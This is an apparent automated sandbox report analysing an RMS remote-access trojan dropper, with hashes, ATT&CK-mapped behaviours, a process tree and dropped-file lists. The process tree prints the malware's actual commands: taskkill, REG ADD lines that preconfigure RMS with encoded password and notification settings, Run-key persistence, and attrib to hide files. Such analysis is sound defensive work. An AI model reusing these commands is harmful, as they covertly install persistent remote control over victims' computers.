rms | 9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e

Analysis

max time kernel
151s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
27-11-2022 22:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe
Size

4.0MB
MD5

c613714d39e2b2bcb8c5d7a6036145ef
SHA1

3eef6909f3f8367cc8336f7af00704cf662d6546
SHA256

9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e
SHA512

af61bf7d26f2ed448042f56ce9d597e1289a535c4266ef713b0bc348467a602ec06dbc25b494dd056eacee22567687fce1417d1dc22ec27ada46009f818569cf
SSDEEP

98304:MeRrH4bOQgJ0PT+kab/bjoecLdvetq0WoNVs/7eiKo8:MeRrHLxJiT+kaLZostq0WoNweiKo8

Score

10^/10

rms evasion persistence rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 3664 created 3380 3664 svchost.exe rutserv.exe
Executes dropped EXE 4 IoCs

Processes:

hide.exerutserv.exerutserv.exerfusclient.exe

pid process

2224 hide.exe
3380 rutserv.exe
1236 rutserv.exe
3748 rfusclient.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4716 attrib.exe

description	pid	process	target process
PID 3664 created 3380	3664	svchost.exe	rutserv.exe

pid	process
2224	hide.exe
3380	rutserv.exe
1236	rutserv.exe
3748	rfusclient.exe

pid	process
4716	attrib.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/memory/3248-132-0x0000000000400000-0x000000000042A000-memory.dmp	upx
C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe	upx
C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe	upx
behavioral2/memory/3248-158-0x0000000000400000-0x000000000042A000-memory.dmp	upx
behavioral2/memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\uac = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\hide.exe"	reg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp	autoit_exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3932 taskkill.exe
1332 taskkill.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

rutserv.exerutserv.exe

pid process

3380 rutserv.exe
3380 rutserv.exe
3380 rutserv.exe
3380 rutserv.exe
1236 rutserv.exe
1236 rutserv.exe

pid	process
3932	taskkill.exe
1332	taskkill.exe

pid	process
3380	rutserv.exe
3380	rutserv.exe
3380	rutserv.exe
3380	rutserv.exe
1236	rutserv.exe
1236	rutserv.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

taskkill.exetaskkill.exerutserv.exesvchost.exerutserv.exe

description	pid	process
Token: SeDebugPrivilege	3932	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	3380	rutserv.exe
Token: SeTcbPrivilege	3664	svchost.exe
Token: SeTcbPrivilege	3664	svchost.exe
Token: SeTakeOwnershipPrivilege	1236	rutserv.exe
Token: SeTcbPrivilege	1236	rutserv.exe
Token: SeTcbPrivilege	1236	rutserv.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

hide.exe

pid process

2224 hide.exe
2224 hide.exe
2224 hide.exe
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

hide.exe

pid process

2224 hide.exe
2224 hide.exe
2224 hide.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

rutserv.exerutserv.exe

pid process

3380 rutserv.exe
1236 rutserv.exe

pid	process
2224	hide.exe
2224	hide.exe
2224	hide.exe

pid	process
2224	hide.exe
2224	hide.exe
2224	hide.exe

pid	process
3380	rutserv.exe
1236	rutserv.exe

Suspicious use of WriteProcessMemory 54 IoCs

Processes:

9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.execmd.exehide.exesvchost.exerutserv.exe

description	pid	process	target process
PID 3248 wrote to memory of 444	3248	9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe	cmd.exe
PID 3248 wrote to memory of 444	3248	9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe	cmd.exe
PID 3248 wrote to memory of 444	3248	9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe	cmd.exe
PID 444 wrote to memory of 3932	444	cmd.exe	taskkill.exe
PID 444 wrote to memory of 3932	444	cmd.exe	taskkill.exe
PID 444 wrote to memory of 3932	444	cmd.exe	taskkill.exe
PID 444 wrote to memory of 1332	444	cmd.exe	taskkill.exe
PID 444 wrote to memory of 1332	444	cmd.exe	taskkill.exe
PID 444 wrote to memory of 1332	444	cmd.exe	taskkill.exe
PID 444 wrote to memory of 5108	444	cmd.exe	reg.exe
PID 444 wrote to memory of 5108	444	cmd.exe	reg.exe
PID 444 wrote to memory of 5108	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4360	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4360	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4360	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4992	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4992	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4992	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4068	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4068	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4068	444	cmd.exe	reg.exe
PID 444 wrote to memory of 308	444	cmd.exe	reg.exe
PID 444 wrote to memory of 308	444	cmd.exe	reg.exe
PID 444 wrote to memory of 308	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4652	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4652	444	cmd.exe	reg.exe
PID 444 wrote to memory of 4652	444	cmd.exe	reg.exe
PID 444 wrote to memory of 3464	444	cmd.exe	reg.exe
PID 444 wrote to memory of 3464	444	cmd.exe	reg.exe
PID 444 wrote to memory of 3464	444	cmd.exe	reg.exe
PID 444 wrote to memory of 3836	444	cmd.exe	reg.exe
PID 444 wrote to memory of 3836	444	cmd.exe	reg.exe
PID 444 wrote to memory of 3836	444	cmd.exe	reg.exe
PID 444 wrote to memory of 2228	444	cmd.exe	reg.exe
PID 444 wrote to memory of 2228	444	cmd.exe	reg.exe
PID 444 wrote to memory of 2228	444	cmd.exe	reg.exe
PID 444 wrote to memory of 2224	444	cmd.exe	hide.exe
PID 444 wrote to memory of 2224	444	cmd.exe	hide.exe
PID 444 wrote to memory of 2224	444	cmd.exe	hide.exe
PID 444 wrote to memory of 4716	444	cmd.exe	attrib.exe
PID 444 wrote to memory of 4716	444	cmd.exe	attrib.exe
PID 444 wrote to memory of 4716	444	cmd.exe	attrib.exe
PID 3248 wrote to memory of 1212	3248	9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe	cmd.exe
PID 3248 wrote to memory of 1212	3248	9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe	cmd.exe
PID 3248 wrote to memory of 1212	3248	9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe	cmd.exe
PID 2224 wrote to memory of 3380	2224	hide.exe	rutserv.exe
PID 2224 wrote to memory of 3380	2224	hide.exe	rutserv.exe
PID 2224 wrote to memory of 3380	2224	hide.exe	rutserv.exe
PID 3664 wrote to memory of 1236	3664	svchost.exe	rutserv.exe
PID 3664 wrote to memory of 1236	3664	svchost.exe	rutserv.exe
PID 3664 wrote to memory of 1236	3664	svchost.exe	rutserv.exe
PID 1236 wrote to memory of 3748	1236	rutserv.exe	rfusclient.exe
PID 1236 wrote to memory of 3748	1236	rutserv.exe	rfusclient.exe
PID 1236 wrote to memory of 3748	1236	rutserv.exe	rfusclient.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

4716 attrib.exe

pid	process
4716	attrib.exe

C:\Users\Admin\AppData\Local\Temp\9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe
"C:\Users\Admin\AppData\Local\Temp\9aab6acf786572e3013cee6ae05915bdf2a4e86da166897ddd030042c233593e.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3248

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Microsoft\install.cmd" "
2⤵
- Suspicious use of WriteProcessMemory
PID:444

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3932

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Options" /t REG_BINARY /d 545046301154524f4d5365727665724f7074696f6e7300095573654e5441757468080d53656375726974794c6576656c020304506f727403121614456e61626c654f7665726c617943617074757265080c53686f775472617949636f6e080642696e644950060d416e7920696e746572666163651343616c6c6261636b4175746f436f6e6e656374091743616c6c6261636b436f6e6e656374496e74657276616c023c0c50617373776f726444617461060c364f6d2b75675147394b493d084869646553746f70090c497046696c746572547970650202105573654c656761637943617074757265081750726f7465637443616c6c6261636b53657474696e6773081550726f74656374496e6574496453657474696e6773080f446f4e6f7443617074757265524450080755736549507636091141736b557365725065726d697373696f6e0816557365725065726d697373696f6e496e74657276616c031027134175746f416c6c6f775065726d697373696f6e08134e656564417574686f72697479536572766572081f41736b5065726d697373696f6e4f6e6c794966557365724c6f676765644f6e0811557365496e6574436f6e6e656374696f6e0813557365437573746f6d496e6574536572766572080a496e65744964506f727402000d557365496e6574496449507636081444697361626c6552656d6f7465436f6e74726f6c081344697361626c6552656d6f746553637265656e081344697361626c6546696c655472616e73666572080f44697361626c655265646972656374080d44697361626c6554656c6e6574081444697361626c6552656d6f746545786563757465081244697361626c655461736b4d616e61676572080e44697361626c654f7665726c6179080f44697361626c6553687574646f776e081444697361626c6552656d6f746555706772616465081544697361626c655072657669657743617074757265081444697361626c654465766963654d616e61676572080b44697361626c6543686174081344697361626c6553637265656e5265636f7264081044697361626c65415643617074757265081244697361626c6553656e644d657373616765080f44697361626c655265676973747279080d44697361626c65415643686174081544697361626c6552656d6f746553657474696e6773081544697361626c6552656d6f74655072696e74696e67080a44697361626c65526470080f4e6f7469667953686f7750616e656c08144e6f746966794368616e67655472617949636f6e08104e6f7469667942616c6c6f6e48696e74080f4e6f74696679506c6179536f756e64080c4e6f7469667950616e656c5802ff0c4e6f7469667950616e656c5902ff064c6f6755736508055369644964061034323033342e37373133373636373832084c6963656e73657306ba524d532d462d36423764666137333434354538394333393762653062623966423866433637666269593253326459586c52664477776e493233696f4f4743346f44686a584b647a4134585246344d44463145624373685631304e48313545447777374b57304241414d484151514e487a7370625135635251344141687741616d426841676b4362774d454377566d64324d4c424235555267344e557a773562514945486c4e635241384d6653593253326459586c526644773d3d0d50726f787953657474696e67731428010000efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d31364c45223f3e0d0a3c70726f78795f73657474696e67732076657273696f6e3d223630303034223e3c7573655f70726f78793e66616c73653c2f7573655f70726f78793e3c70726f78795f747970653e303c2f70726f78795f747970653e3c686f73743e3c2f686f73743e3c706f72743e383038303c2f706f72743e3c6e6565645f617574683e66616c73653c2f6e6565645f617574683e3c6e746d6c5f617574683e66616c73653c2f6e746d6c5f617574683e3c757365726e616d653e3c2f757365726e616d653e3c70617373776f72643e3c2f70617373776f72643e3c646f6d61696e3e3c2f646f6d61696e3e3c2f70726f78795f73657474696e67733e0d0a0a4164646974696f6e616c0604353535351144697361626c65496e7465726e65744964080b536166654d6f6465536574080000
3⤵
PID:5108

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "InternetId" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d00310036004c00450022003f003e000d000a003c0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073002000760065007200730069006f006e003d0022003600300030003000340022003e003c0069006e007400650072006e00650074005f00690064003e003500310035002d003100330037002d003900320034003c002f0069006e007400650072006e00650074005f00690064003e003c007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e0074007200750065003c002f007500730065005f0069006e00650074005f0063006f006e006e0065006300740069006f006e003e003c0069006e00650074005f007300650072007600650072003e003c002f0069006e00650074005f007300650072007600650072003e003c007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e00660061006c00730065003c002f007500730065005f0063007500730074006f006d005f0069006e00650074005f007300650072007600650072003e003c0069006e00650074005f00690064005f0070006f00720074003e0035003600350035003c002f0069006e00650074005f00690064005f0070006f00720074003e003c007500730065005f0069006e00650074005f00690064005f0069007000760036003e00660061006c00730065003c002f007500730065005f0069006e00650074005f00690064005f0069007000760036003e003c002f0072006d0073005f0069006e007400650072006e00650074005f00690064005f00730065007400740069006e00670073003e000d000a00
3⤵
PID:4360

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "Password" /t REG_BINARY /d 38003900440043004100460043003500460042003900450044004200380041003800370030003400350033003600390033003300350037003700340030003800440031003700410036003500390036003400390033003800460033004100340035003400380036003200370030003100310037004600420036003300390041003700350043004300310039004400360046003400380030003000460030003700320037003900370036004200370030004300420041003800340037003700390034003900300034003600450033003400360034003600350030004300430045004100410045003800390046004100430030003500390037004600390032003400
3⤵
PID:4992

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CallbackSettings" /t REG_BINARY /d fffe
3⤵
PID:4068

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "notification" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c007500730065003e0074007200750065003c002f007500730065003e003c0065006d00610069006c003e00750073002e006b00650079004000790061006e006400650078002e00720075003c002f0065006d00610069006c003e003c00690064003e007b00310034004100430031004200430038002d0041004300420036002d0034003100370043002d0038003400410045002d004300320039004400360032003200450044003300430042007d003c002f00690064003e003c00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e00660061006c00730065003c002f00670065006e00650072006100740065005f006e00650077005f00700061007300730077006f00720064003e003c00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e00660061006c00730065003c002f00610073006b005f006900640065006e00740069006600690063006100740069006f006e003e003c00730065006e0074003e00660061006c00730065003c002f00730065006e0074003e003c00760065007200730069006f006e003e00360030003000300034003c002f00760065007200730069006f006e003e003c007000750062006c00690063005f006b00650079005f006d003e003c002f007000750062006c00690063005f006b00650079005f006d003e003c007000750062006c00690063005f006b00650079005f0065003e003c002f007000750062006c00690063005f006b00650079005f0065003e003c00700061007300730077006f00720064003e003c002f00700061007300730077006f00720064003e003c0069006e007400650072006e00650074005f00690064003e003c002f0069006e007400650072006e00650074005f00690064003e003c0064006900730063006c00610069006d00650072003e003c002f0064006900730063006c00610069006d00650072003e003c002f0072006d0073005f0069006e00650074005f00690064005f006e006f00740069006600690063006100740069006f006e003e000d000a00
3⤵
PID:308

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "FUSClientPath" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe"
3⤵
PID:4652

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Server\Parameters" /f /v "CalendarRecordSettings" /t REG_BINARY /d fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003600300030003000340022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00
3⤵
PID:3464

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v uac2 /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe" /f
3⤵
PID:3836

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "uac" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe"
3⤵
- Adds Run key to start application
PID:2228

C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe"
3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2224

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
rutserv.exe
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3380

C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe -second
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1236

C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe
C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe /tray /user
6⤵
- Executes dropped EXE
PID:3748

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Microsoft\*.*"
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
2⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3664

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd
Filesize
300B

MD5
37fb6f29c7eadc5015cc1d3de40bda6c

SHA1
559517b0545c2d57d85a62cddb5a9c156ac5d808

SHA256
885bd0a9ca439ab47b456243a7feddb40b6900eb7fe591dad018fb46d89d64f9

SHA512
a0c7f7cde083096b154441a0f4197e7162203a52a65e00ded63108a76197ce86efcfb6d986ce5c9e954eefb967af358b9969dabea082fe967d2bdac8162a0af0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
Filesize
366KB

MD5
625853e2048849b0ecd47bd6cfd6a705

SHA1
a9382760732e95d9be675b5494a1a29f55853a73

SHA256
53c22abdc57b3d91d474b29ea98a7ad79eb991591b697aa8c2b1214548bd62f8

SHA512
713f96a69569d1ed6f794772c0ccd314ef16429c48b13c63f9560c08d8ac57ea73c3ead0677c8886dcc86e55f19d72d2b116ecfa0766aaabe6e6d78db42c81fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\hide.exe
Filesize
366KB

MD5
625853e2048849b0ecd47bd6cfd6a705

SHA1
a9382760732e95d9be675b5494a1a29f55853a73

SHA256
53c22abdc57b3d91d474b29ea98a7ad79eb991591b697aa8c2b1214548bd62f8

SHA512
713f96a69569d1ed6f794772c0ccd314ef16429c48b13c63f9560c08d8ac57ea73c3ead0677c8886dcc86e55f19d72d2b116ecfa0766aaabe6e6d78db42c81fb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\install.cmd
Filesize
10KB

MD5
294c12aea77808afd52e3e355831eaf3

SHA1
f152d3ccfa5b9ed27c158ba98990da6ac238238d

SHA256
fd27eafba3d87daf5251e707631322812d24a9b03c72ad0262ab8fc3d8308fc4

SHA512
ddd8ce6efa46d27d7374403b0ba6f6405d2cfc9c47c2e9d3c22c62d1c227ea989d11c0232ac19fbab83f765d5f641b784ae30c43398e5fc56ab0c5fb8fe9ddce

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe
Filesize
1.3MB

MD5
314f4d76a82e024a1c0facb46f0dbc0a

SHA1
c8437c555755302a47229cdc18b58d0ee961d00f

SHA256
9c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67

SHA512
b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\rfusclient.exe
Filesize
1.3MB

MD5
314f4d76a82e024a1c0facb46f0dbc0a

SHA1
c8437c555755302a47229cdc18b58d0ee961d00f

SHA256
9c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67

SHA512
b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
Filesize
6.1MB

MD5
75c2572ab3afad8f4f462c3221be14f4

SHA1
8429b630a9113fa1d07b27cc494429adb7f77aa0

SHA256
f6a8e096046e1f541cff82d063e941bb2b2849944403e25295703cce0dbb0c92

SHA512
03f5d58cb589e9c501d935e11c16cffc2b35f3c5b9e8cc35c7ed16d333251377d0ecd741265a052963c978d837aae4d4891c80fb7de4b30b0e22007431094cf9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
Filesize
6.1MB

MD5
75c2572ab3afad8f4f462c3221be14f4

SHA1
8429b630a9113fa1d07b27cc494429adb7f77aa0

SHA256
f6a8e096046e1f541cff82d063e941bb2b2849944403e25295703cce0dbb0c92

SHA512
03f5d58cb589e9c501d935e11c16cffc2b35f3c5b9e8cc35c7ed16d333251377d0ecd741265a052963c978d837aae4d4891c80fb7de4b30b0e22007431094cf9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\rutserv.exe
Filesize
6.1MB

MD5
75c2572ab3afad8f4f462c3221be14f4

SHA1
8429b630a9113fa1d07b27cc494429adb7f77aa0

SHA256
f6a8e096046e1f541cff82d063e941bb2b2849944403e25295703cce0dbb0c92

SHA512
03f5d58cb589e9c501d935e11c16cffc2b35f3c5b9e8cc35c7ed16d333251377d0ecd741265a052963c978d837aae4d4891c80fb7de4b30b0e22007431094cf9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\vp8decoder.dll
Filesize
127KB

MD5
bda3c03c3e5d65922a311009e0ae8cd6

SHA1
37093c457ac5f01649b4d23a3d075a531af08baa

SHA256
30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290

SHA512
eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\vp8encoder.dll
Filesize
238KB

MD5
200cba4b9cbdd64f1a281b89cd1467f3

SHA1
fc3ccf8d57efcdc0d22b61ff6e49798d551a9118

SHA256
c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e

SHA512
15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\webmmux.dll
Filesize
90KB

MD5
aa78ed008f72533c7136bf6d4bddb0d0

SHA1
2e9abd74e615adc99f561cbdbe6067dfd81a406a

SHA256
41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11

SHA512
e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\webmvorbisdecoder.dll
Filesize
141KB

MD5
0867a260483876336a727cf9f2928b13

SHA1
3c8c59bfba6ed2aeef35c0d1fc4689683df1e660

SHA256
cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207

SHA512
b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\webmvorbisencoder.dll
Filesize
202KB

MD5
43adc4acd56c56b0a25664954c7aa80c

SHA1
d9085625b4a39b3969db8047ad3224b3fc9f60fc

SHA256
0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918

SHA512
346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Download Submit
memory/308-141-0x0000000000000000-mapping.dmp

Download
memory/444-133-0x0000000000000000-mapping.dmp

Download
memory/1212-157-0x0000000000000000-mapping.dmp

Download
memory/1236-163-0x0000000000000000-mapping.dmp

Download
memory/1332-136-0x0000000000000000-mapping.dmp

Download
memory/2224-147-0x0000000000000000-mapping.dmp

Download
memory/2224-162-0x00000000008F0000-0x00000000009D9000-memory.dmp

Filesize
932KB

Download
memory/2228-145-0x0000000000000000-mapping.dmp

Download
memory/3248-132-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
